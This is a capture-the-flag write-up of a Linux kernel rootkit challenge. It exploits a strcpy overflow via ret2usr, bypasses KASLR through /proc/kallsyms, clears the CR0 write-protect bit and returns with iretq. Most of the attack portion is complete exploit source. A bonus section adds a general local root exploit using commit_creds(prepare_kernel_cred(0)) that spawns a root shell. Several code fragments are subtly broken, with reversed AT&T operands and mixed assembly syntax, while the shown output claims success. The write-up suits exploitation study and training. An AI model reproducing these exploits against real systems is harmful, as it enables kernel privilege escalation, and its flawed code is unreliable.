TL;DR

Same rootkit, harder exploitation. No SMEP/SMAP means we can execute userspace code from kernel context (ret2usr). Overflow the buffer → execute our shellcode → disable CR0 write protection → restore syscall table → iretq back to userspace. Oh, and we can also get root shell as a bonus.

Tags: pwn kernel rootkit ret2usr privilege-escalation CR0 iretq SMEP-bypass

Challenge Files: Kernel module (rootkit), same as before


Note: This writeup assumes you’ve read the previous “Hello Rootkitty” challenge. I’ll focus on the advanced techniques specific to the “Harder” version without repeating the basics.


What’s Different?

The vulnerability is the same (buffer overflow in strcpy), but now we have:

New constraints:

  • KASLR is enabled (addresses randomized)
  • Write Protection (WP bit in CR0) is active
  • Need to return cleanly to userspace

But also new opportunities:

  • SMEP/SMAP are disabled - we can execute userspace code from kernel!
  • We have /proc/kallsyms access for KASLR bypass

This opens up ret2usr attacks - one of the classic kernel exploitation techniques.

Understanding the Syscall Table

Before diving into exploitation, let’s understand what we’re attacking.

How Syscalls Work

A syscall is how userspace programs ask the kernel to do privileged operations:

┌─────────────────────────────────────────┐
│         USERSPACE (Ring 3)              │
│                                         │
│  Program: read(fd, buffer, size)       │
│              │                          │
│              ▼                          │
│         syscall(0, ...)                 │
└──────────────│──────────────────────────┘
               │
               │ Transition Ring 3 → Ring 0
               ▼
┌─────────────────────────────────────────┐
│         KERNEL SPACE (Ring 0)           │
│                                         │
│  Syscall Table:                         │
│  ┌────────────────────────┐             │
│  │ [0]  → sys_read        │             │
│  │ [1]  → sys_write       │             │
│  │ [2]  → sys_open        │             │
│  │ [3]  → sys_close       │             │
│  │ ...                    │             │
│  │ [6]  → sys_lstat       │ (0x06)      │
│  │ [78] → sys_getdents    │ (0x4e)      │
│  │ ...                    │             │
│  │ [217]→ sys_getdents64  │ (0xd9)      │
│  └────────────────────────┘             │
└─────────────────────────────────────────┘

The syscall table is just an array of function pointers:

// Simplified Linux kernel code
void *sys_call_table[] = {
    [0]   = sys_read,
    [1]   = sys_write,
    [6]   = sys_lstat,      // 0x06
    [78]  = sys_getdents,   // 0x4e (0x270 bytes offset)
    [217] = sys_getdents64, // 0xd9 (0x6c8 bytes offset)
};

Rootkit Syscall Hooking

The rootkit modifies these pointers to intercept calls:

// Normal state
sys_call_table[217] = sys_getdents64;

// After infection
sys_call_table[217] = malicious_getdents64;

// Now when you do ls:
ls  getdents64()  malicious_getdents64() 
    filters results 
    hides files
    calls real sys_getdents64

Write Protection (CR0 Register)

The syscall table is normally read-only. The WP (Write Protect) bit in the CR0 register prevents writes:

// Disable WP (bit 16 of CR0)
mov rax, cr0
and rax, ~0x10000    // Clear bit 16
mov cr0, rax

// Now we can modify the table
sys_call_table[217] = evil_function;

// Re-enable WP
mov rax, cr0
or rax, 0x10000      // Set bit 16
mov cr0, rax

This is exactly what rootkits do - and what we’ll need to do to restore the table.

The Challenge

Same three hooked syscalls as before:

Syscall Number Hex Table Offset Purpose
lstat 6 0x06 0x30 File metadata
getdents 78 0x4e 0x270 List directory (32-bit)
getdents64 217 0xd9 0x6c8 List directory (64-bit)

The vulnerability is still the strcpy buffer overflow - offset is still 102 bytes to RIP.

Active Protections

Protection Status Bypass Method
KASLR Enabled Read /proc/kallsyms
WP (CR0) Enabled Disable in shellcode
SMEP Disabled Ret2usr possible!
SMAP Disabled User memory accessible from kernel

The lack of SMEP/SMAP is the game changer here.

What is SMEP/SMAP?

SMEP (Supervisor Mode Execution Prevention):

  • Prevents kernel from executing code in userspace memory
  • Without it: we can put our shellcode in userspace and jump to it from kernel

SMAP (Supervisor Mode Access Prevention):

  • Prevents kernel from accessing userspace memory
  • Without it: kernel can read/write our userspace variables

Impact: With both disabled, we can execute userspace code with kernel privileges (ret2usr).

Exploitation Strategy

Our approach will be different from the basic version:

  1. Bypass KASLR - Parse /proc/kallsyms for kernel base address
  2. Write userspace shellcode - Function that restores the syscall table
  3. Overflow buffer - Same technique, offset 102
  4. Return to userspace - Use shellcode to fix table, then return cleanly
  5. iretq back - Proper transition from kernel to userspace

Why This is Harder

Unlike the first version where we just called cleanup_module(), now we need to:

  • Manually manipulate CR0 to disable write protection
  • Write directly to the syscall table
  • Use iretq instruction to return to userspace properly
  • Save and restore CPU context (CS, SS, RSP, RFLAGS)

Step 1: KASLR Bypass

Kernel addresses randomize on each boot. We need to read them at runtime:

unsigned long resolve_kernel_symbol(const char *symbol_name) {
    FILE *kallsyms = fopen("/proc/kallsyms", "r");
    if (!kallsyms) return 0;
    
    char buffer[512], current_symbol[256];
    unsigned long symbol_addr = 0;
    
    // Format: <address> <type> <symbol>
    // Example: ffffffffa2800000 T _text
    while (fgets(buffer, sizeof(buffer), kallsyms)) {
        if (sscanf(buffer, "%lx %*c %s", &symbol_addr, current_symbol) == 2) {
            if (strcmp(current_symbol, symbol_name) == 0) {
                fclose(kallsyms);
                return symbol_addr;
            }
        }
    }
    
    fclose(kallsyms);
    return 0;
}

// Usage
unsigned long kbase = resolve_kernel_symbol("_text");
unsigned long syscall_table = kbase + 0x8001a0;

Step 2: Save Userspace Context

Before triggering the exploit, we need to save our userspace CPU state for later return:

unsigned long saved_cs, saved_ss, saved_rflags, saved_rsp;

void capture_userspace_context() {
    asm volatile(
        "mov %%cs, %0;"      // Code Segment
        "mov %%ss, %1;"      // Stack Segment  
        "mov %%rsp, %2;"     // Stack Pointer
        "pushfq;"            // Push RFLAGS
        "pop %3;"            // Pop into variable
        : "=r"(saved_cs), "=r"(saved_ss), 
          "=r"(saved_rsp), "=r"(saved_rflags)
    );
}

Why? The iretq instruction needs these values to properly return from kernel to userspace.

Step 3: The Restore Shellcode

This is where the magic happens. Our shellcode runs in kernel context:

void restore_syscall_table() {
    unsigned long *sys_table = (unsigned long *)(kbase + 0x8001a0);
    
    // 1. Disable Write Protection (clear bit 16 of CR0)
    asm volatile(
        "mov %%cr0, %%rax;"
        "and $~0x10000, %%rax;"  // Clear WP bit
        "mov %%rax, %%cr0;"
        ::: "rax"
    );
    
    // 2. Restore original syscalls
    sys_table[217] = kbase + 0xc7610;  // sys_getdents64
    sys_table[78]  = kbase + 0xc7710;  // sys_getdents
    sys_table[6]   = kbase + 0xbad30;  // sys_lstat
    
    // 3. Re-enable Write Protection (set bit 16)
    asm volatile(
        "mov %%cr0, %%rax;"
        "or $0x10000, %%rax;"    // Set WP bit
        "mov %%rax, %%cr0;"
        ::: "rax"
    );
    
    // 4. Return to userspace via iretq
    // iretq pops in order: RIP, CS, RFLAGS, RSP, SS
    asm volatile(
        "swapgs;"                          // Swap GS (kernel ↔ user)
        "mov %0, %%r14; push %%r14;"       // SS
        "mov %1, %%r14; push %%r14;"       // RSP
        "mov %2, %%r14; push %%r14;"       // RFLAGS
        "mov %3, %%r14; push %%r14;"       // CS
        "mov %4, %%r14; push %%r14;"       // RIP
        "iretq;"
        :
        : "m"(saved_ss), "m"(saved_rsp), "m"(saved_rflags),
          "m"(saved_cs), "r"(cleanup_and_exit)
        : "r14"
    );
}

void cleanup_and_exit() {
    // Back in userspace now!
    exit(EXIT_SUCCESS);
}

Understanding swapgs + iretq

swapgs:

  • Swaps the GS register base between kernel and user values
  • Necessary for proper context switching
  • Without it: GS corruption leads to kernel panic

iretq (Interrupt Return):

  • Privileged instruction that returns from an interrupt/exception
  • Pops 5 values from stack: RIP, CS, RFLAGS, RSP, SS
  • Transitions from Ring 0 (kernel) to Ring 3 (userspace)
  • Without it: we’d stay in kernel mode and crash

Why not just ret?

  • ret only pops RIP - doesn’t restore full CPU state
  • We’d return to userspace with kernel-mode CS/SS
  • First syscall or privilege check would trigger a fault

Step 4: Build the Payload

int main() {
    char filename[256];
    char buffer[256];
    
    // 1. Bypass KASLR
    kbase = resolve_kernel_symbol("_text");
    printf("[+] Kernel base: 0x%lx\n", kbase);
    
    // 2. Save context for iretq
    capture_userspace_context();
    
    // 3. Build exploit filename
    strcpy(filename, "ecsc_flag_");
    memset(filename + 10, 'B', 102);  // Padding to RIP
    
    // 4. ROP chain
    unsigned long *rop = (unsigned long *)(filename + 112);
    rop[0] = kbase + 0x02fd70;                    // ret (stack alignment)
    rop[1] = (unsigned long)restore_syscall_table; // our shellcode
    
    // 5. Create malicious file
    int fd = open(filename, O_RDWR | O_CREAT, 0644);
    close(fd);
    
    // 6. Trigger vulnerability
    fd = open(".", O_RDONLY | O_DIRECTORY);
    syscall(SYS_getdents, fd, buffer, 256);
    close(fd);
    
    return 0;
}

Execution Flow

Here’s what happens when we trigger the exploit:

1. Create file: ecsc_flag_BBB...[ret][shellcode_addr]
                                     ↓
2. syscall(SYS_getdents) → kernel calls ecsc_sys_getdents()
                                     ↓
3. strcpy(buffer, filename) → OVERFLOW overwrites return address
                                     ↓
4. Function returns → RIP = restore_syscall_table
                                     ↓
5. Shellcode executes (in kernel context):
   mov cr0, rax; and rax, ~0x10000; mov rax, cr0  ← Disable WP
   sys_table[217] = sys_getdents64                 ← Restore entries
   sys_table[78]  = sys_getdents
   sys_table[6]   = sys_lstat  
   mov cr0, rax; or rax, 0x10000; mov rax, cr0    ← Enable WP
   swapgs                                          ← Prep GS for userspace
   push SS/RSP/RFLAGS/CS/RIP                       ← Setup stack for iretq
   iretq                                           ← Return to userspace
                                     ↓
6. cleanup_and_exit() executes → exit(0)
                                     ↓
7. Rootkit disabled! Files are visible

Full Exploit Code

// Compilation: gcc -o pwn pwn.c -static -no-pie -O0
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

// Kernel offsets (find via reverse engineering or trial)
#define SYSCALL_TABLE_OFFSET 0x8001a0
#define GETDENTS64_OFFSET    0xc7610
#define GETDENTS_OFFSET      0xc7710
#define LSTAT_OFFSET         0xbad30
#define RET_GADGET_OFFSET    0x02fd70
#define OVERFLOW_OFFSET      102

static unsigned long kbase = 0;
static unsigned long saved_cs, saved_ss, saved_rflags, saved_rsp;

unsigned long resolve_kernel_symbol(const char *symbol_name) {
    FILE *kallsyms = fopen("/proc/kallsyms", "r");
    if (!kallsyms) return 0;
    
    char buffer[512], current_symbol[256];
    unsigned long symbol_addr = 0;
    
    while (fgets(buffer, sizeof(buffer), kallsyms)) {
        if (sscanf(buffer, "%lx %*c %s", &symbol_addr, current_symbol) == 2) {
            if (strcmp(current_symbol, symbol_name) == 0) {
                fclose(kallsyms);
                return symbol_addr;
            }
        }
    }
    
    fclose(kallsyms);
    return 0;
}

void capture_userspace_context() {
    asm volatile(
        "mov %%cs, %0;"
        "mov %%ss, %1;"
        "mov %%rsp, %2;"
        "pushfq;"
        "pop %3;"
        : "=r"(saved_cs), "=r"(saved_ss), 
          "=r"(saved_rsp), "=r"(saved_rflags)
    );
}

void cleanup_and_exit() {
    exit(EXIT_SUCCESS);
}

void restore_syscall_table() {
    unsigned long *sys_table = (unsigned long *)(kbase + SYSCALL_TABLE_OFFSET);
    
    // Disable Write Protection
    asm volatile(
        "mov %%cr0, %%rax;"
        "and $~0x10000, %%rax;"
        "mov %%rax, %%cr0;"
        ::: "rax"
    );
    
    // Restore hooked syscalls
    sys_table[217] = kbase + GETDENTS64_OFFSET;
    sys_table[78]  = kbase + GETDENTS_OFFSET;
    sys_table[6]   = kbase + LSTAT_OFFSET;
    
    // Re-enable Write Protection
    asm volatile(
        "mov %%cr0, %%rax;"
        "or $0x10000, %%rax;"
        "mov %%rax, %%cr0;"
        ::: "rax"
    );
    
    // Return to userspace
    asm volatile(
        "swapgs;"
        "mov %0, %%r14; push %%r14;"  // SS
        "mov %1, %%r14; push %%r14;"  // RSP
        "mov %2, %%r14; push %%r14;"  // RFLAGS
        "mov %3, %%r14; push %%r14;"  // CS
        "mov %4, %%r14; push %%r14;"  // RIP
        "iretq;"
        :
        : "m"(saved_ss), "m"(saved_rsp), "m"(saved_rflags),
          "m"(saved_cs), "r"(cleanup_and_exit)
        : "r14"
    );
}

int main() {
    char filename[256];
    char buffer[256];
    int fd;
    
    // Step 1: Bypass KASLR
    kbase = resolve_kernel_symbol("_text");
    if (!kbase) {
        fprintf(stderr, "[-] Failed to resolve kernel base\n");
        return EXIT_FAILURE;
    }
    
    printf("[+] Kernel base: 0x%lx\n", kbase);
    printf("[+] Syscall table: 0x%lx\n", kbase + SYSCALL_TABLE_OFFSET);
    
    // Step 2: Save userspace context
    capture_userspace_context();
    
    // Step 3: Build payload
    memset(filename, 0, sizeof(filename));
    strcpy(filename, "ecsc_flag_");
    
    int prefix_len = strlen(filename);
    memset(filename + prefix_len, 'B', OVERFLOW_OFFSET);
    
    // Step 4: ROP chain
    unsigned long *rop = (unsigned long *)(filename + prefix_len + OVERFLOW_OFFSET);
    rop[0] = kbase + RET_GADGET_OFFSET;
    rop[1] = (unsigned long)restore_syscall_table;
    
    printf("[+] Shellcode @ 0x%lx\n", (unsigned long)restore_syscall_table);
    printf("[+] Weaponizing filename...\n");
    
    // Step 5: Create malicious file
    fd = open(filename, O_RDWR | O_CREAT, 0644);
    if (fd < 0) {
        perror("[-] File creation failed");
        return EXIT_FAILURE;
    }
    close(fd);
    
    printf("[+] Triggering vulnerability...\n");
    
    // Step 6: Trigger overflow
    fd = open(".", O_RDONLY | O_DIRECTORY);
    if (fd < 0) {
        perror("[-] Directory open failed");
        return EXIT_FAILURE;
    }
    
    syscall(SYS_getdents, fd, buffer, sizeof(buffer));
    close(fd);
    
    fprintf(stderr, "[-] Exploit failed\n");
    return EXIT_FAILURE;
}

Execution

$ cd /mnt/share
$ gcc -o pwn pwn.c -static -no-pie -O0
$ ./pwn
[+] Kernel base: 0xffffffffae800000
[+] Syscall table: 0xffffffffaf0001a0
[+] Shellcode @ 0x4019d5
[+] Weaponizing filename...
[+] Triggering vulnerability...

$ cd /
$ cat ecsc_flag_*
ECSC{2e94068aa85e0a7a21163fcad4566a0f92fa08dcaf874a5e34fba4612cfd7eaa}

Success!

BONUS: Root Shell Exploitation

Why just restore the syscall table when we can get root?

Kernel Privilege Functions

Linux kernel provides two critical functions for privilege management:

// Creates credentials with specified UID/GID (0 = root)
struct cred *prepare_kernel_cred(struct task_struct *daemon);

// Applies credentials to current process
int commit_creds(struct cred *new);

Magic combo: commit_creds(prepare_kernel_cred(0)) gives us UID/GID 0!

Root Shellcode

void shellcode() {
    // commit_creds(prepare_kernel_cred(0))
    asm(
        ".intel_syntax noprefix;"
        "xor rdi, rdi;"              // rdi = 0 (NULL)
        "mov rax, %0;"               // rax = prepare_kernel_cred
        "call rax;"                  // prepare_kernel_cred(0)
        "mov rdi, rax;"              // rdi = result (new creds)
        "mov rax, %1;"               // rax = commit_creds
        "call rax;"                  // commit_creds(new_creds)
        ".att_syntax;"
        :
        : "r"(prepare_kernel_cred), "r"(commit_creds)
        : "rax", "rdi", "rdx", "rcx", "rsi", "r8", "r9", "r10", "r11"
    );
    
    // Return to userspace
    asm(
        ".intel_syntax noprefix;"
        "swapgs;"
        "mov r15, user_ss;"
        "push r15;"
        "mov r15, user_sp;"
        "push r15;"
        "mov r15, user_rflags;"
        "push r15;"
        "mov r15, user_cs;"
        "push r15;"
        "mov r15, %0;"
        "push r15;"
        "iretq;"
        ".att_syntax;"
        :
        : "r"(spawn_shell)
        : "r15"
    );
}

void spawn_shell() {
    printf("[+] UID: %d\n", getuid());
    if (getuid() == 0) {
        printf("[+] ROOT SHELL!\n");
    }
    execve("/bin/sh", NULL, NULL);
    exit(0);
}

Root Exploit (Full Code)

// gcc -o root root.c -static -no-pie -O0
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h> 
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

#define OFFSET 102
#define GADGET_RET_OFFSET 0x02fd70

unsigned long user_cs, user_ss, user_rflags, user_sp;
unsigned long prepare_kernel_cred;
unsigned long commit_creds;
unsigned long kernel_base;

void save_state() {
    asm(
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
}

void spawn_shell() {
    printf("[+] UID: %d\n", getuid());
    
    if (getuid() == 0) {
        printf("[+] ROOT SHELL OBTAINED!\n");
    }
    
    char *argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, NULL);
    exit(0);
}

void shellcode() {
    // commit_creds(prepare_kernel_cred(0))
    asm(
        "xor %%rdi, %%rdi;"
        "mov %%rax, %0;"
        "call *%%rax;"
        "mov %%rdi, %%rax;"
        "mov %%rax, %1;"
        "call *%%rax;"
        :
        : "r"(prepare_kernel_cred), "r"(commit_creds)
        : "rax", "rdi", "rdx", "rcx", "rsi", "r8", "r9", "r10", "r11"
    );
    
    // Return to userspace
    asm(
        "swapgs;"
        "mov %%r15, %0; push %%r15;"
        "mov %%r15, %1; push %%r15;"
        "mov %%r15, %2; push %%r15;"
        "mov %%r15, %3; push %%r15;"
        "mov %%r15, %4; push %%r15;"
        "iretq;"
        :
        : "m"(user_ss), "m"(user_sp), "m"(user_rflags), 
          "m"(user_cs), "r"(spawn_shell)
        : "r15"
    );
}

unsigned long get_symbol(const char *sym) {
    FILE *f = fopen("/proc/kallsyms", "r");
    if (!f) return 0;
    
    char line[256], name[128];
    unsigned long addr = 0;
    
    while (fgets(line, sizeof(line), f)) {
        if (sscanf(line, "%lx %*c %s", &addr, name) == 2) {
            if (!strcmp(name, sym)) {
                fclose(f);
                return addr;
            }
        }
    }
    fclose(f);
    return 0;
}

int main() {
    char name[200];
    unsigned long *rop;
    
    // Resolve symbols
    kernel_base = get_symbol("_text");
    prepare_kernel_cred = get_symbol("prepare_kernel_cred");
    commit_creds = get_symbol("commit_creds");
    
    if (!kernel_base || !prepare_kernel_cred || !commit_creds) {
        printf("[-] Failed to resolve symbols\n");
        return 1;
    }
    
    printf("[+] kernel_base:          0x%lx\n", kernel_base);
    printf("[+] prepare_kernel_cred:  0x%lx\n", prepare_kernel_cred);
    printf("[+] commit_creds:         0x%lx\n", commit_creds);
    printf("[+] shellcode:            0x%lx\n", (unsigned long)shellcode);
    
    save_state();
    
    // Build payload
    memset(name, 0, sizeof(name));
    strcpy(name, "ecsc_flag_");
    memset(name + 10, 'A', OFFSET);
    
    rop = (unsigned long *)(name + 10 + OFFSET);
    rop[0] = kernel_base + GADGET_RET_OFFSET;
    rop[1] = (unsigned long)shellcode;
    
    printf("[+] Triggering privilege escalation...\n");
    
    // Trigger
    int fd = open(name, O_RDWR | O_CREAT, 0644);
    close(fd);
    
    fd = open(".", O_RDONLY);
    syscall(SYS_getdents, fd, name, 200);
    
    printf("[-] Still here\n");
    return 0;
}

Root Shell Demo

$ id
uid=1000(user) gid=1000(user)

$ ./root
[+] kernel_base:          0xffffffffa2800000
[+] prepare_kernel_cred:  0xffffffffa28ab540
[+] commit_creds:         0xffffffffa28ab1e0
[+] shellcode:            0x401b3f
[+] Triggering privilege escalation...
[+] UID: 0

# id
uid=0(root) gid=0(root)

Why Root Method Works

  1. prepare_kernel_cred(0) creates a cred structure with UID/GID/capabilities = 0
  2. commit_creds(new_cred) applies these credentials to current process
  3. iretq to spawn_shell() - process inherits root credentials
  4. getuid() returns 0 - we’re root!

No need to touch CR0 or syscall table - we’re just calling legitimate kernel functions.

Protection mechanisms:

Protection If Enabled If Disabled
SMEP Blocks ret2usr Userspace code executable from kernel
SMAP Blocks user memory access Kernel can read/write userspace
KASLR Randomizes addresses Fixed addresses
WP (CR0) Syscall table read-only Can be modified

Key insights:

  • ret2usr is powerful but requires SMEP to be disabled
  • iretq is necessary for clean kernel-to-user transitions

Flag

ECSC{2e94068aa85e0a7a21163fcad4566a0f92fa08dcaf874a5e34fba4612cfd7eaa}